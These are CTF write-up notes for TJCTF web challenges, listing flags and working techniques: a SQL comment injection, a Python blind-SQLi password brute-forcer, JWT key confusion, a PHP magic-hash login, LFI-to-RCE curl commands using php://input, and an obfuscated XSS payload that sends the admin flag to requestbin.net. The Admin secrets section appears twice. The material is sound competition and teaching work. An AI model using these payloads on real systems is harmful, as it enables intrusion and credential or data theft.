1 of 9

Web

Sarah Palin Fanpage

Saves cookie with dict of liked moments

Replace cookie and go to vip area

Circus

/.git exists, use gitdumper to get source Type juggling, password is sha256'd and compared with == Revert to get old user creds from git 34250003024812 is a magic sha256 string Andon1956:34250003024812

Login sequel

Set username to "admin'/*" and the password to whatever this is so the command executed is

"SELECT username, password FROM `userandpassword` WHERE username='admin/*' AND password='<md5 HASH object @ 0x00000151246A95F8>'"
/* is a comment so everything after that is ignored.

flag is tjctf{W0w_wHa1_a_SqL1_exPeRt!}

Weak Password

We can use the SQL LIKE clause to bruteforce the password one character at a time.

import requests

url = 'https://weak_password.tjctf.org/login'
alphabet = 'abcdefghijklmnopqrstuvwxyz'

print('Bruteforcing password: ', end='', flush=True)
for i in range(100):
    for char in alphabet:
        r = requests.post(url, data = {'username': 'test', 'password': f"a' OR EXISTS(SELECT * FROM `userandpassword` WHERE username='admin' AND password LIKE '{'_'*i}{char}%') AND ''='"})
        if 'Wrong' not in r.text:
            print(char, end='', flush=True)
            break
    else:
        print('\nPassword found')

The password is 'blinded', the flag is:

tjctf{blinded}

Moar Horse 4

Jwt HSA/RSA signing vulnerability Use pubkey.pem with jwt_tool.py 'speed' is calculated with

speed = int(hashlib.md5(("Horse_" + horse).encode()).hexdigest(), 16)

'ajuuer' is fast enough Set horses to ["ajuuer"] Race Get flag

tjctf{w0www_y0ur_h0rs3_is_f444ST!}

from pwn import *
import hashlib
from pwnlib.util.iters import mbruteforce
import string

BOSS_HORSE = "MechaOmkar-YG6BPRJM"
goal = int(hashlib.md5(("Horse_" + BOSS_HORSE).encode()).hexdigest(), 16)
def attempt(horse):
        speed = int(hashlib.md5(("Horse_" + horse).encode()).hexdigest(), 16)
        if speed > goal:
                return True
        else:
                return False
myhorse = mbruteforce(attempt, string.ascii_lowercase, length=10)
print(myhorse)

Gamer W

Unity webgl game, requires adding the Cetus Chrome Extension Use cetus to search (f32) for current health, narrow down results and freeze in place Increase attack damage to 5000 When placed behind a wall, use either 0x01a508b8, 0x01a5ab60, 0x01fc6560or 0x01fc65b0 to move yourself out

tjctf{c3tus_del3tus_ur_m3ms_g0ne}

File Viewer

Basic LFI Vuln curl -XPOST 'https://file_viewer.tjctf.org/reader.php?file=php://input' -d '<?php system("whoami"); ?>' - www-data ls -la:

-r--r--r-- 1 root     root       44 May 18 15:32 apple.txt
-r--r--r-- 1 root     root       74 May 24 15:12 grape.txt
dr-xr-xr-x 1 root     root     4096 May 24 15:12 i_wonder_whats_in_here
-r--r--r-- 1 root     root     3012 May 18 15:32 index.html
-r--r--r-- 1 root     root       27 May 18 15:32 orange.txt
-r--r--r-- 1 root     root       49 May 18 15:32 pear.txt
-r--r--r-- 1 root     root       27 May 18 15:32 pinneaple.txt
-r--r--r-- 1 root     root     2532 May 18 15:32 reader.php
-r--r--r-- 1 root     root       22 May 18 15:32 watermelon.txt

curl -XPOST 'https://file_viewer.tjctf.org/reader.php?file=php://input' -d '<?php system("cat i_wonder_whats_in_here/* "); ?>'

tjctf{n1c3_j0b_with_lf1_2_rc3}

Admin secrets

Can perform XSS by reporting to admin Admin dashboard has a link to /admin_flag Requesting admin_flag from a page with {, ", ', `, or gives an error

<img src="0" onerror="eval(String.fromCharCode(118,97,114,32,120,104,116,116,112,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,120,104,116,116,112,46,111,110,114,101,97,100,121,115,116,97,116,101,99,104,97,110,103,101,61,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,120,104,116,116,112,50,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,105,102,40,116,104,105,115,46,115,116,97,116,117,115,61,61,50,48,48,41,123,120,104,116,116,112,50,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,58,47,47,114,101,113,117,101,115,116,98,105,110,46,110,101,116,47,114,47,49,103,50,117,104,110,55,49,63,111,117,116,61,39,43,101,110,99,111,100,101,85,82,73,40,98,116,111,97,40,116,104,105,115,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,44,116,114,117,101,41,125,101,108,115,101,123,120,104,116,116,112,50,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,58,47,47,114,101,113,117,101,115,116,98,105,110,46,110,101,116,47,114,47,49,103,50,117,104,110,55,49,63,111,117,116,61,39,43,116,104,105,115,46,115,116,97,116,117,115,44,116,114,117,101,41,125,120,104,116,116,112,50,46,115,101,110,100,40,41,125,59,120,104,116,116,112,46,111,112,101,110,40,39,71,69,84,39,44,39,47,97,100,109,105,110,95,102,108,97,103,39,44,116,114,117,101,41,59,120,104,116,116,112,46,115,101,110,100,40,41,59))">

Takes the flag and forwards it to a request bin

Admin secrets

Can perform XSS by reporting to admin Admin dashboard has a link to /admin_flag Requesting admin_flag from a page with {, ", ', `, or gives an error

<img src="0" onerror="eval(String.fromCharCode(118,97,114,32,120,104,116,116,112,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,120,104,116,116,112,46,111,110,114,101,97,100,121,115,116,97,116,101,99,104,97,110,103,101,61,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,120,104,116,116,112,50,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,105,102,40,116,104,105,115,46,115,116,97,116,117,115,61,61,50,48,48,41,123,120,104,116,116,112,50,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,58,47,47,114,101,113,117,101,115,116,98,105,110,46,110,101,116,47,114,47,49,103,50,117,104,110,55,49,63,111,117,116,61,39,43,101,110,99,111,100,101,85,82,73,40,98,116,111,97,40,116,104,105,115,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,44,116,114,117,101,41,125,101,108,115,101,123,120,104,116,116,112,50,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,58,47,47,114,101,113,117,101,115,116,98,105,110,46,110,101,116,47,114,47,49,103,50,117,104,110,55,49,63,111,117,116,61,39,43,116,104,105,115,46,115,116,97,116,117,115,44,116,114,117,101,41,125,120,104,116,116,112,50,46,115,101,110,100,40,41,125,59,120,104,116,116,112,46,111,112,101,110,40,39,71,69,84,39,44,39,47,97,100,109,105,110,95,102,108,97,103,39,44,116,114,117,101,41,59,120,104,116,116,112,46,115,101,110,100,40,41,59))">

Takes the flag and forwards it to a request bin